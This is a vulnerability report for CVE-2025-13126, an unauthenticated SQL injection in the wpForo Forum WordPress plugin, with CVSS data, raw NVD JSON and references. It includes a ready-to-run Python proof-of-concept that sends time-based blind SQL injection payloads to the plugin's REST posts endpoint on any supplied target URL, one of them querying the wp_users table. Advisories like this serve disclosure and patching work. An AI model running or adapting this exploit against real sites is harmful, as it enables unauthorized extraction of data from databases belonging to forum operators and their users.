Security Vulnerability Report
中文
CVE-2025-13126 CVSS 7.5 HIGH

CVE-2025-13126

Published: 2025-12-14 05:16:00
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The wpForo Forum plugin for WordPress is vulnerable to generic SQL Injection via the `post_args` and `topic_args` parameters in all versions up to, and including, 2.4.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

wpForo Forum <= 2.4.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13126 SQL Injection PoC for wpForo Forum < 2.4.13 # Target: WordPress site with wpForo Forum plugin def test_sqli(target_url): """Test for SQL injection vulnerability in wpForo Forum plugin""" # Vulnerable parameters: post_args, topic_args # This PoC demonstrates time-based blind SQL injection headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Normal request (baseline) normal_payload = '1' # Payload with time-based SQL injection (MySQL SLEEP function) # Adjust sleep time based on testing environment sqli_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))test)-- " print(f'[*] Testing target: {target_url}') print('[*] Sending baseline request...') # Test normal request try: params = {'post_args': normal_payload} resp1 = requests.get(f'{target_url}/wp-json/wpforo/v1/posts', params=params, headers=headers, timeout=10) print(f'[+] Baseline response time: {resp1.elapsed.total_seconds():.2f}s') except Exception as e: print(f'[-] Error in baseline request: {e}') return False print('[*] Sending SQL injection payload...') # Test SQL injection payload try: params = {'post_args': sqli_payload} resp2 = requests.get(f'{target_url}/wp-json/wpforo/v1/posts', params=params, headers=headers, timeout=30) elapsed = resp2.elapsed.total_seconds() print(f'[+] Injection response time: {elapsed:.2f}s') if elapsed >= 5: print('[+] VULNERABLE! Time-based SQL injection confirmed') print('[*] Extracting database version...') # Database version extraction payload version_payload = "1' AND (SELECT * FROM (SELECT SLEEP(3) FROM (SELECT COUNT(*) FROM wp_users)x)a)-- " params = {'post_args': version_payload} resp3 = requests.get(f'{target_url}/wp-json/wpforo/v1/posts', params=params, headers=headers, timeout=20) return True else: print('[-] Target may not be vulnerable') return False except requests.exceptions.Timeout: print('[+] VULNERABLE! Request timed out as expected') return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} https://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') test_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13126", "sourceIdentifier": "[email protected]", "published": "2025-12-14T05:15:59.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The wpForo Forum plugin for WordPress is vulnerable to generic SQL Injection via the `post_args` and `topic_args` parameters in all versions up to, and including, 2.4.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Posts.php?rev=3386327#L633", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Topics.php?rev=3386327#L1641", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentPosts.php?rev=3386327#L177", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentTopics.php?rev=3386327#L117", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd1704ef-e259-40a3-974b-128145bc8a4a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.